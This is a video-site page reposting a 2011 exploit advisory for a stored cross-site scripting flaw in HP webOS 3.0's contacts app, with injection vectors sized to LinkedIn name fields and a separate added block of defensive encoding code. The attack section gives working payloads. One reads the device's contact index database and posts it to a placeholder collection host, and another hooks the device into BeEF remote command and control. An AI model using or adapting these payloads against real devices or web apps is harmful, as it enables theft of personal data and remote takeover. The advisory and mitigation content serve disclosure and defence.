
HP TouchPad Exploit - WebOS3.0 Remote Code Execution

10 views 02/09/21
How To & Style

All comments and opinions are the property of this individual, and do not represent my employer(s) or their policies. All content is provided "as is" with no warranties, assurances, or guarantees.

DISCLAIMER*
For educational purposes only.
"Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for fair use for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use."


# Exploit Title: HP webOS 3.0 Remote Code Execution Vulnerability
# Author: malloc(i)
# Date: 06/30/2011
# Software Link:
# https://developer.palm.com/con....tent/resources/devel
# Product: http://www.palm.com/us/product....s/pads/touchpad/inde
AJAX Code:
http://cybermediaplanet.com/se....curity/webOS3.0/webO

White Doc From webOS 1.4.x (Same Concept Different Version) :
http://cybermediaplanet.com/se....curity/webOS1.4.x/Pa

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP webOS 3.0. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the contacts application. When the application handles the first name and/or last name of an imported contact, injected HTML/JavaScript in those fields is rendered rather than displayed as text, which allows an attacker to inject arbitrary code into the contacts application. This can be abused by an attacker to perform a cross-site scripting attack on the device.
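
As an added example (not part of the original advisory and not HP's code), one way a contacts view can treat imported names as text: it HTML-encodes the joined name at render time and flags names that carry markup at import. The function names, the space separator and the sample records are assumptions made for illustration.

```javascript
// Added example: output-encode imported contact names before they reach HTML.
// Assumption: the display name is first + " " + last (the page does not state the separator).

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
  "`": "&#96;",
};

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(value) {
  const text = value == null ? "" : String(value);
  return text.replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the name as the UI shows it, so checks and encoding see the joined string.
function displayName(contact) {
  return [contact.firstName, contact.lastName]
    .map((part) => (part == null ? "" : String(part).trim()))
    .filter(Boolean)
    .join(" ");
}

// Render path: the joined name is encoded as a whole, never inserted raw.
function renderContactRow(contact) {
  return `<div class="contact-name">${escapeHtml(displayName(contact))}</div>`;
}

// Import-time check: report names that carry markup or a script-capable URL
// scheme so the record can be logged and reviewed.
function auditContact(contact) {
  const name = displayName(contact);
  const findings = [];
  if (/[<>]/.test(name)) findings.push("markup-characters");
  if (/\b(?:javascript|data|vbscript)\s*:/i.test(name)) findings.push("script-scheme");
  return { name, suspicious: findings.length > 0, findings };
}

// Constructed sample records; the second reuses a vector shape shown on this page.
const SAMPLE_CONTACTS = [
  { firstName: "Ada", lastName: "O'Neil" },
  { firstName: "Test", lastName: "<img src='javascript:[CODE]'/>" },
];
```

Encoding at render is the control that closes the flaw; the import audit only gives visibility into records that arrive carrying markup.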

The ability for an attacker to execute arbitrary code can be demonstrated by the following proof of concept.

Attack Vector:
Inject the JavaScript code into the contact information within LinkedIn to get an external JavaScript file to execute. The first name and last name fields are concatenated within webOS, so the limit of 20 characters per name entry imposed by LinkedIn can be extended to 40 characters.
JavaScript code could also be run through an iframe, img, etc.
Create a vector within the 40-character limit:
<iframe src="javascript:document.write('<script src=URL/payload.js></script>')">
<iframe src='javascript:[CODE]'></iframe>
<a href='javascript:[CODE]'></a>
<img src='javascript:[CODE]'/>

Inject XSS code to source in a remote JavaScript file which will execute the malicious payload.


Remote JavaScript Payload Examples:

1) Remote File Access Vulnerability

document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" ></script></head><iframe src=\"javascript:var get=new Ajax.Request('/var/db/main/indexes.db',{method:'get',evalJSON:'false',onSuccess:function(response){var request=new Ajax.Request('http://www.URL/collectData.php',{method:'post',evalJson:'false',postBody:response.responseText});}});\"></html>");

2) Remote Command and Control (BeEF)

document.write("<html><head><script src=\"/usr/palm/frameworks/mojo/mojo.js\" type=\"text/javascript\" x-mojo-version\"1\"></script></head><script src=\"http://URL/beef/hook/beefmagic.js.php\" type=\"text/javascript\" x-mojo-version=\"1\"></script></html>");


WebOS3.0 SDK Email Exploit Example:
http://www.youtube.com/watch?v=qKKrcJeyY-w

How It Is Done (WebOS1.4.x Example):
http://www.youtube.com/watch?v=Y5f8zJNiB_0


http://cybermediaplanet.com/security.html
